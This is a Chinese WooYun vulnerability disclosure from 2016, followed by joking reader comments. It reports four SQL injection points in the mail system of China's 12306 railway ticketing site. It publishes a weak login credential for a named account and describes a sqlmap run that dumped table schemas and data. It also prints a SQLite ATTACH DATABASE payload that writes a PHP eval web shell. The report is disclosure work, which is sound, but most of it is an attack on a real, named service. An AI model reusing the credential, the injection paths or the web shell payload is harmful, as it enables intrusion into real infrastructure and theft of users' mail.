12306官方邮箱系统深度SQL注入漏洞至少4处

编号173220
Urlhttp://www.wooyun.org/bug.php?action=view&id=173220
漏洞状态漏洞已经通知厂商但是厂商忽略漏洞
漏洞标题12306官方邮箱系统深度SQL注入漏洞至少4处
漏洞类型SQL注射漏洞
厂商12306
白帽子路人甲
提交日期2016-01-27 23:31:00
公开日期2016-02-01 23:40:00
修复时间(not set)
确认时间0000-00-00 00:00:00
Confirm Spend-1
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank15
厂商评级
厂商评rank0
漏洞简介
不要想着看标题能找到漏洞,别费劲了!
下载的tangscan的插件,好厉害!
漏洞细节

下载的tangscan的插件检测到的

a3.jpg


http://mail.12306.cn/app/mail/entry
邮箱弱口令:
zhangyong/123456

0.png


本想看看上传的地方有没有问题,结果只发现了SQL注入

a1.png


a2.png


http://mail.12306.cn
post:
/app/simple/mail/Folder/list/Sent/0/20*
/app/simple/mail/Folder/list/Draft/0/20*
/app/simple/mail/Folder/list/Spam/0/20*
/app/simple/mail/Folder/list/Trash/0/20*
这4处应该都是SQL注入点


注入点空格需要替换成%20,不然就404

POC

扔sqlmap,结果注入点类型是:SQLite,有点意思

1.png


2.png


5个表的结果如下:

mail:
mtbno,mno,fno,new,size,time,dele,attach,mid,reply,mfrom,mto,subject,brief
folder:
fno,folder,sum,count,new,last
searchmail:
session,sno,mtbno,mno,fno,time
sqlite_sequence:
name,seq
search:
session,sno,time,count,name,value


SQLite出数据的方式不太一样,换个姿势--sql-shell
简单读几条数据证明危害

3.png


4.png


5.png


6.png


查了下,SQLite这玩意可以直接写shell,但是需要知道网站路径,不玩了
shell方式:

ATTACH DATABASE '$PATH\\shell.php' AS pwn; CREATE TABLE pwn.exp(dataz text); INSERT INTO pwn.exp(dataz)VALUES('<? eval($_GET['cmd']);?>');--

修复方案

好不容易抢到回家的票!
俺是良民

状态信息 2016-01-27: 细节已通知厂商并且等待厂商处理中
2016-02-01: 厂商已经主动忽略漏洞,细节向公众公开
厂商回复None漏洞Rank:15 (WooYun评价)
回应信息危害等级:无影响厂商忽略忽略时间:2016-02-01 23:40
Showing 1-20 of 20 items.
评论内容评论人点赞数评论时间

前排露个脸,万一火了呢。

Agony02016-02-01 21:49:00

您好,充气娃娃到了,开下门

小哲哥02016-01-30 15:34:00

开门,您订的方便面到了

XiaoXu02016-01-28 20:47:00

刚上线的功能下载插件执行,这么快就用上了。

boooooom02016-01-28 18:16:00

下载的tangscan的插件,好厉害!

乌云白帽子02016-01-28 17:39:00

再给1分,12306也是没救了

管管侠02016-01-28 14:34:00

这个不会也1rank吧。。。。

紫霞仙子02016-01-28 14:22:00

开门,查水表的

禽兽放开那妹子02016-01-28 11:53:00

开门,送快递的

ledoo02016-01-28 11:46:00

花生瓜子火腿肠

Space02016-01-28 11:35:00

mark

ba1ma002016-01-28 11:08:00

已经定位到洞主,警察在赶来的路上。

伤心的猫猫02016-01-28 10:44:00

前排露个胸,万一火了呢。

小白喵咪02016-01-28 10:42:00

看看

随风的风02016-01-28 10:16:00

前排露个牙,万一火了呢。

韩客西02016-01-28 09:58:00

前排露个脸,万一火了呢。

丶Soim02016-01-28 09:28:00

MARK

小红猪02016-01-28 08:49:00

shit

sangfor.org02016-01-28 07:05:00

...

zeracker02016-01-28 01:03:00

NONO 难说,这说不准

hkcs02016-01-28 00:48:00